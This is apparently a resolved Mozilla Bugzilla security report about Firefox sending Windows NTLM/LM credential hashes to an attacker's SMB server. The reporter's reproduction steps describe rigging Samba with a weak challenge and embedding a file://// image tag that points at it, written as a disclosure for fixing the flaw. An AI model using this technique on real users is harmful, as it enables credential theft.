Firefox sends NT username/pass hash to evil SMB server which decrypts password

RESOLVED FIXED in mozilla1.8beta2

Status

()

Core
Networking
P1
major
RESOLVED FIXED
14 years ago
12 years ago

People

(Reporter: Aaron Spangler, Assigned: Darin Fisher)

Tracking

Trunk
mozilla1.8beta2
x86
Windows 2000
Points:
---
Dependency tree / graph

Firefox Tracking Flags

(Not tracked)

Details

(Whiteboard: [sg:fix], URL)

(Reporter)

Description

14 years ago
User-Agent:       Mozilla/5.0 (X11; U; Linux i586; en-US; rv:1.7) Gecko/20040626 Firefox/0.9.1
Build Identifier: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)  [Firefox 0.9.1]

In the URL above, a security exploit from a while back is described.  Firefox is
vulnerable to this attack.  Evil SMB & Web servers can collect your Windows
username, your Windows Lanman Password, Your Windows NT Password, your Windows
Machine Name, your Windows Domain Name.  Since the evil server (not our client)
determins the Challenge in Challenge/Response, it can be a contrived value that
makes decrypting the original passwors much easier.  I can demonstrate to a few
key folks at Mozilla.org so that we can get it fixed, but I don't want to flood
the net with exploits on how it works.  Please contact me if I can provie more info.

Reproducible: Sometimes
Steps to Reproduce:
1. Setup Samba on a box on the net, modifying a few lines of code to fix the
"Challenge" to a weak value.  
2. Place an image on the Samba share, allowing all to read once authenticated.
3. Put an <img src=file:////ipOfSMBServer/share/image.gif> any or all web sites
you want to.
4.  Firefox will strip off the first two slashes and convert the remainder to
back slashes.  For example if the evil server was 10.2.3.4, the UNC pathname is
fetched by windows \\10.2.3.4\share\image.gif.
5.  The OS will then gladly provide all authentication asked by the evil smb server.

Actual Results:  
Most windows clients using weak or no firewalls gladly send your credentials to
the evil smb server where they are harvested.  Weak firewalls include standard
consumer grade (Linksys, Netgear...).

Expected Results:  
Prevent references to file://// if the referring url is not already file:////

Please contact me at (614)751-9329 after business hours if I can provide more
information.  You can also reach me by email at as@insight.rr.com.
(Assignee)

Comment 1

14 years ago
See also bug 69070.  Jesse points out that we'd still want to fix this bug as
well since there may be other places where CheckLoadURI isn't called.

To solve this bug, perhaps we just need to modify how we compute the origin for
file:// URLs when a SMB share is specified.

Confirming bug.  This is pretty serious given the relative weakness of the LMv1
hash.
Status: UNCONFIRMED → NEW
Ever confirmed: true
(Assignee)

Comment 2

14 years ago
bz: here's an example exploit that leverages bug 69070.
(Assignee)

Comment 3

14 years ago
> To solve this bug, perhaps we just need to modify how we compute the origin for
> file:// URLs when a SMB share is specified.

er... nevermind.  i was thinking about cross-site scripting, but that's
something else completely.  calling CheckLoadURI for <img> loads seems like the
right fix for this bug.  doing an audit of the code to make sure that we are
calling CheckLoadURI everywhere that it is needed is probably a good idea :)
Doing such an audit is an absolute must, yes.
Depends on: 69070

Comment 5

14 years ago
> Jesse points out that we'd still want to fix this bug as
> well since there may be other places where CheckLoadURI isn't called.

A better argument: we'd still want to fix this bug because sites shouldn't be
able to steal your Windows password by merely getting you to load a file: URL.
Not firefox-specific, over to networking.

Note bug 69070 has been fixed, but we should still fix this one.
Assignee: firefox → darin
Component: General → Networking
Product: Firefox → Core
Whiteboard: [sg:fix]
Version: unspecified → Trunk
(Assignee)

Comment 7

14 years ago
I think we want to implement bug 250691 to make it harder to exploit the user if
they happen to send their domain\username + password to an evil site.  Most
modern servers understand the NTLM hash (MD4 based), so we can probably get away
with not sending the older and much weaker LM hash.
Status: NEW → ASSIGNED
Target Milestone: --- → mozilla1.8beta2
(Assignee)

Updated

13 years ago
Severity: normal → major
Depends on: 250691
Priority: -- → P1
(Assignee)

Comment 8

13 years ago
This is now fixed for Firefox 1.1.  See bug 250691.

Is this something we should consider backporting?
Status: ASSIGNED → RESOLVED
Last Resolved: 13 years ago
Resolution: --- → FIXED

Comment 9

12 years ago
Does this still need to be security-sensitive?  It sounds like it was fixed for Firefox 1.5.
Group: security
You need to log in before you can comment on or make changes to this bug.